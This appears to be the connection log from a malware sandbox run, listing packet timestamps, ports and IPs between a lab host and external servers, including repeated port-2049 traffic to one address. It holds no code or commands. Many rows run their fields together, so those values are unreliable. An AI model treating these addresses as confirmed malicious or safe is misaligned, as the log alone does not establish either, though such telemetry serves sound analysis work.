Nov 5, 2024 17:03:19.997242928 CET  59508        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:20.073457003 CET  59509        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:20.078614950 CET  80           59509      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:20.078716040 CET  59509        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:20.078854084 CET  59509        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:20.078890085 CET  59509        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:20.083808899 CET  80           59509      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:20.083842039 CET  80           59509      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:20.550265074 CET  59511        2049       192.168.2.5      212.162.149.53
Nov 5, 2024 17:03:20.555233955 CET  2049         59511      212.162.149.53   192.168.2.5
Nov 5, 2024 17:03:20.555335045 CET  59511        2049       192.168.2.5      212.162.149.53
Nov 5, 2024 17:03:20.555562973 CET  59511        2049       192.168.2.5      212.162.149.53
Nov 5, 2024 17:03:20.560920954 CET  2049         59511      212.162.149.53   192.168.2.5
Nov 5, 2024 17:03:20.982525110 CET  80           59509      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:20.982597113 CET  80           59509      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:20.982664108 CET  80           59509      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:20.982671022 CET  59509        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:20.982728958 CET  59509        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:20.982805967 CET  59509        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:20.987684011 CET  80           59509      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:21.034197092 CET  2049         59511      212.162.149.53   192.168.2.5
Nov 5, 2024 17:03:21.034288883 CET  59511        2049       192.168.2.5      212.162.149.53
Nov 5, 2024 17:03:21.034518957 CET  59511        2049       192.168.2.5      212.162.149.53
Nov 5, 2024 17:03:21.192059994 CET  59516        80         192.168.2.5      18.141.10.107
Nov 5, 2024 17:03:21.197048903 CET  80           59516      18.141.10.107    192.168.2.5
Nov 5, 2024 17:03:21.197150946 CET  59516        80         192.168.2.5      18.141.10.107
Nov 5, 2024 17:03:21.197280884 CET  59516        80         192.168.2.5      18.141.10.107
Nov 5, 2024 17:03:21.197313070 CET  59516        80         192.168.2.5      18.141.10.107
Nov 5, 2024 17:03:21.202111959 CET  80           59516      18.141.10.107    192.168.2.5
Nov 5, 2024 17:03:21.202124119 CET  80           59516      18.141.10.107    192.168.2.5
Nov 5, 2024 17:03:22.628385067 CET  80           59516      18.141.10.107    192.168.2.5
Nov 5, 2024 17:03:22.628576040 CET  59516        80         192.168.2.5      18.141.10.107
Nov 5, 2024 17:03:22.633943081 CET  80           59516      18.141.10.107    192.168.2.5
Nov 5, 2024 17:03:22.634051085 CET  59516        80         192.168.2.5      18.141.10.107
Nov 5, 2024 17:03:22.934393883 CET  59527        80         192.168.2.5      172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.940927029 CET8059527172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.941021919 CET5952780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.941175938 CET5952780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.941194057 CET5952780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.947707891 CET8059527172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.947854996 CET8059527172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:23.629692078 CET8059527172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:23.629772902 CET5952780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:23.655586958 CET5952780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:23.660419941 CET8059527172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.326018095 CET5953480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.412199974 CET805948782.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.412293911 CET5948780192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.412389994 CET5948780192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.413327932 CET805948782.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.413518906 CET5948780192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.415529966 CET8059534172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.415627003 CET5953480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.415813923 CET5953480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.415838957 CET5953480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.417680025 CET805948782.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.421446085 CET8059534172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.421602964 CET8059534172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.436799049 CET5953580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.441766024 CET805953582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.441840887 CET5953580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.441998959 CET5953580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.442027092 CET5953580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.447076082 CET805953582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.447088003 CET805953582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.080126047 CET8059534172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.080774069 CET5953480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.080802917 CET5953480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.086479902 CET8059534172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.284511089 CET5953880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.289597988 CET805953834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.291838884 CET5953880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.292009115 CET5953880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.292026997 CET5953880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.296811104 CET805953834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.296823025 CET805953834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.046432018 CET595442049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.051265955 CET204959544212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.055134058 CET595442049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.057548046 CET595442049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.062865019 CET204959544212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.266257048 CET805953834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.266714096 CET5953880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.271989107 CET805953834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.275146961 CET5953880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.547831059 CET204959544212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.547929049 CET595442049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.548192024 CET595442049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.582591057 CET5955080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.590200901 CET805955018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.590286016 CET5955080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.590785980 CET5955080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.590785980 CET5955080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.597081900 CET805955018.208.156.248192.168.2.5
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Nov 5, 2024 17:03:26.597095966 CET           80      59550  18.208.156.248   192.168.2.5
Nov 5, 2024 17:03:27.263700962 CET           80      59550  18.208.156.248   192.168.2.5
Nov 5, 2024 17:03:27.263907909 CET        59550         80  192.168.2.5      18.208.156.248
Nov 5, 2024 17:03:27.269330978 CET           80      59550  18.208.156.248   192.168.2.5
Nov 5, 2024 17:03:27.269407034 CET        59550         80  192.168.2.5      18.208.156.248
Nov 5, 2024 17:03:27.492813110 CET        59556         80  192.168.2.5      208.100.26.245
Nov 5, 2024 17:03:27.930094004 CET           80      59556  208.100.26.245   192.168.2.5
Nov 5, 2024 17:03:27.930203915 CET        59556         80  192.168.2.5      208.100.26.245
Nov 5, 2024 17:03:27.930447102 CET        59556         80  192.168.2.5      208.100.26.245
Nov 5, 2024 17:03:27.930470943 CET        59556         80  192.168.2.5      208.100.26.245
Nov 5, 2024 17:03:27.937505007 CET           80      59556  208.100.26.245   192.168.2.5
Nov 5, 2024 17:03:27.937546015 CET           80      59556  208.100.26.245   192.168.2.5
Nov 5, 2024 17:03:28.568125963 CET           80      59556  208.100.26.245   192.168.2.5
Nov 5, 2024 17:03:28.608021021 CET        59556         80  192.168.2.5      208.100.26.245
Nov 5, 2024 17:03:28.608048916 CET        59556         80  192.168.2.5      208.100.26.245
Nov 5, 2024 17:03:28.613437891 CET           80      59556  208.100.26.245   192.168.2.5
Nov 5, 2024 17:03:28.613475084 CET           80      59556  208.100.26.245   192.168.2.5
Nov 5, 2024 17:03:28.753660917 CET           80      59556  208.100.26.245   192.168.2.5
Nov 5, 2024 17:03:28.809678078 CET        59556         80  192.168.2.5      208.100.26.245
Nov 5, 2024 17:03:28.981244087 CET        59562         80  192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:28.989428043 CET           80      59562  13.251.16.150    192.168.2.5
Nov 5, 2024 17:03:28.989510059 CET        59562         80  192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:28.989689112 CET        59562         80  192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:28.989715099 CET        59562         80  192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:28.994649887 CET           80      59562  13.251.16.150    192.168.2.5
Nov 5, 2024 17:03:28.994662046 CET           80      59562  13.251.16.150    192.168.2.5
Nov 5, 2024 17:03:30.456079960 CET           80      59562  13.251.16.150    192.168.2.5
Nov 5, 2024 17:03:30.470071077 CET        59562         80  192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:30.475493908 CET           80      59562  13.251.16.150    192.168.2.5
Nov 5, 2024 17:03:30.475600004 CET        59562         80  192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:31.561675072 CET        59573       2049  192.168.2.5      212.162.149.53
Nov 5, 2024 17:03:31.855550051 CET         2049      59573  212.162.149.53   192.168.2.5
Nov 5, 2024 17:03:31.855715036 CET        59573       2049  192.168.2.5      212.162.149.53
Nov 5, 2024 17:03:31.856035948 CET        59573       2049  192.168.2.5      212.162.149.53
Nov 5, 2024 17:03:31.861722946 CET         2049      59573  212.162.149.53   192.168.2.5
Nov 5, 2024 17:03:31.963349104 CET        59574         80  192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:31.968854904 CET           80      59574  44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:31.968936920 CET        59574         80  192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:31.969162941 CET        59574         80  192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:31.969263077 CET        59574         80  192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:31.974077940 CET           80      59574  44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:31.974211931 CET           80      59574  44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:32.350879908 CET         2049      59573  212.162.149.53   192.168.2.5
Nov 5, 2024 17:03:32.350955963 CET        59573       2049  192.168.2.5      212.162.149.53
Nov 5, 2024 17:03:32.351268053 CET        59573       2049  192.168.2.5      212.162.149.53
Nov 5, 2024 17:03:32.630348921 CET           80      59574  44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:32.630609035 CET        59574         80  192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:32.636495113 CET           80      59574  44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:32.637943029 CET        59574         80  192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:32.823600054 CET        59580         80  192.168.2.5      54.244.188.177
Nov 5, 2024 17:03:32.828491926 CET           80      59580  54.244.188.177   192.168.2.5
Nov 5, 2024 17:03:32.828733921 CET        59580         80  192.168.2.5      54.244.188.177
Nov 5, 2024 17:03:32.828912020 CET        59580         80  192.168.2.5      54.244.188.177
Nov 5, 2024 17:03:32.828931093 CET        59580         80  192.168.2.5      54.244.188.177
Nov 5, 2024 17:03:32.833791018 CET           80      59580  54.244.188.177   192.168.2.5
Nov 5, 2024 17:03:32.834445000 CET           80      59580  54.244.188.177   192.168.2.5
Nov 5, 2024 17:03:32.930636883 CET           80      59535  82.112.184.197   192.168.2.5
Nov 5, 2024 17:03:32.933142900 CET        59535         80  192.168.2.5      82.112.184.197
Nov 5, 2024 17:03:32.933346987 CET        59535         80  192.168.2.5      82.112.184.197
Nov 5, 2024 17:03:32.938445091 CET           80      59535  82.112.184.197   192.168.2.5
Nov 5, 2024 17:03:32.978509903 CET        59586         80  192.168.2.5      47.129.31.212
Nov 5, 2024 17:03:32.983445883 CET           80      59586  47.129.31.212    192.168.2.5
Nov 5, 2024 17:03:32.985719919 CET        59586         80  192.168.2.5      47.129.31.212
Nov 5, 2024 17:03:32.985902071 CET        59586         80  192.168.2.5      47.129.31.212
Nov 5, 2024 17:03:32.985923052 CET        59586         80  192.168.2.5      47.129.31.212
Nov 5, 2024 17:03:32.991097927 CET           80      59586  47.129.31.212    192.168.2.5
Nov 5, 2024 17:03:32.991142988 CET           80      59586  47.129.31.212    192.168.2.5
Nov 5, 2024 17:03:33.667948961 CET           80      59580  54.244.188.177   192.168.2.5
Nov 5, 2024 17:03:33.711565018 CET        59580         80  192.168.2.5      54.244.188.177
Nov 5, 2024 17:03:33.716882944 CET           80      59580  54.244.188.177   192.168.2.5
Nov 5, 2024 17:03:33.716948986 CET        59580         80  192.168.2.5      54.244.188.177
Nov 5, 2024 17:03:33.994590998 CET        59592         80  192.168.2.5      35.164.78.200
Nov 5, 2024 17:03:33.999645948 CET           80      59592  35.164.78.200    192.168.2.5
Nov 5, 2024 17:03:33.999737024 CET        59592         80  192.168.2.5      35.164.78.200
Nov 5, 2024 17:03:33.999886990 CET        59592         80  192.168.2.5      35.164.78.200
Nov 5, 2024 17:03:33.999911070 CET        59592         80  192.168.2.5      35.164.78.200
Nov 5, 2024 17:03:34.005547047 CET           80      59592  35.164.78.200    192.168.2.5
Nov 5, 2024 17:03:34.005561113 CET           80      59592  35.164.78.200    192.168.2.5
Nov 5, 2024 17:03:34.413471937 CET           80      59586  47.129.31.212    192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.413665056 CET5958680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.422959089 CET805958647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.423046112 CET5958680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.453665972 CET5959380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.458767891 CET805959313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.458843946 CET5959380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.459052086 CET5959380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.459069967 CET5959380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.463926077 CET805959313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.463983059 CET805959313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.824301958 CET805959235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.824505091 CET5959280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.829754114 CET805959235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.829819918 CET5959280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.014417887 CET5959980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.019344091 CET80595993.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.019428968 CET5959980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.019838095 CET5959980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.019853115 CET5959980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.024815083 CET80595993.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.025048018 CET80595993.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.692034006 CET80595993.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.729100943 CET5959980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.730952978 CET80595993.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.731091022 CET5959980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.734189034 CET80595993.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.878051043 CET805959313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.881139994 CET5959380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.887043953 CET805959313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.887130022 CET5959380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.528209925 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.533479929 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.533575058 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.533978939 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.534085989 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.538768053 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.539421082 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.545944929 CET5960580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.550949097 CET805960544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.551304102 CET5960580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.551304102 CET5960580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.551331997 CET5960580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.556308031 CET805960544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.556816101 CET805960544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.215595007 CET805960544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.215989113 CET5960580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.221389055 CET805960544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.221463919 CET5960580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.233697891 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.246969938 CET5961180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.251883984 CET805961118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.251950026 CET5961180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.252228022 CET5961180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.252252102 CET5961180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.257061958 CET805961118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.257500887 CET805961118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.267164946 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.267232895 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.272178888 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.272253990 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.873228073 CET805963234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.875267029 CET5963280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.881484032 CET805963234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.881546021 CET5963280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.185008049 CET5964380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.190051079 CET805964354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.190145969 CET5964380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.190515995 CET5964380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.190584898 CET5964380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.195301056 CET805964354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.195446014 CET805964354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.342601061 CET805963734.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.342832088 CET5963780192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.348006964 CET805963734.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.348112106 CET5963780192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.466406107 CET5964680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.471366882 CET805964618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.471452951 CET5964680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.471607924 CET5964680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.471630096 CET5964680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.476438999 CET805964618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.477212906 CET805964618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.028856993 CET805964354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.029908895 CET5964380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.035600901 CET805964354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.035669088 CET5964380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.134263039 CET805964618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.134617090 CET5964680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.139859915 CET805964618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.143109083 CET5964680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.181180000 CET5965280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.186001062 CET8059652208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.189193010 CET5965280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.189733982 CET5965280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.189766884 CET5965280192.168.2.5208.100.26.245
